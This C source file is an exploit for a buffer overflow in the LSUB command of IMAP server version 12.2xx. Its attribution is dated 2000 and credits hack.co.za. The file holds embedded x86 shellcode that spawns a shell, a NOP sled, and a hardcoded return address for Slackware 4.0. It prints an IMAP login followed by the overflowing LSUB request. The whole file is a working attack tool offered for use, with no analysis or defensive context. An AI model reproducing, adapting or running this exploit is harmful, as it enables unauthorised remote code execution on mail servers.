/* IMAPrev1 12.2xx exploit ( lsub bug )
 * del0rean@s0ftpj.org
 * solo per la mafietta ! */
 
/* v 12.250 - slackware 4.0 esp = 0xbffff890 offset = 1000 */
/* please add! */

#include <stdio.h>
#include <string.h>

#define LENGTH 1064

char shellcode[] = /* dunno where i grabbed thiz :) */
            "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
            "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
            "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
            "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
            "\x2f\x32\x39\x3e\x2f\x43\x38";

void usage()
{
 printf("IMAPrev1 v 12.2xx exploit\n");
 printf("Usage : ./explo user pass <offset>\n");
 exit(0);
}

void main( int argc, char *argv[] )
{
  int i, offset = 0;
  char buf[LENGTH];
  unsigned long esp = 0xbffff890;  /* 12.250 - slackware 4.0 */
  
  if(argc < 3) usage();
  if(argc == 4) offset = atoi(argv[3]);
  // fprintf(stderr,"0x%x\n", ge()  );
  memset(buf, 0x90, 1032);
  memcpy(buf+613, shellcode, strlen(shellcode));
  for(i = strlen(shellcode)+613; i <= LENGTH; i+=4)
     *(long *)&buf[i] = (unsigned long) esp - offset;

  printf("1 LOGIN %s %s\n", argv[1], argv[2]);
  printf("1 LSUB \"\" {1064}\r\n");
  for(i = 0; i < LENGTH; i++)
     putchar(buf[i]);
     printf("\r\n");  
}
/*                   www.hack.co.za   [25 September 2000]*/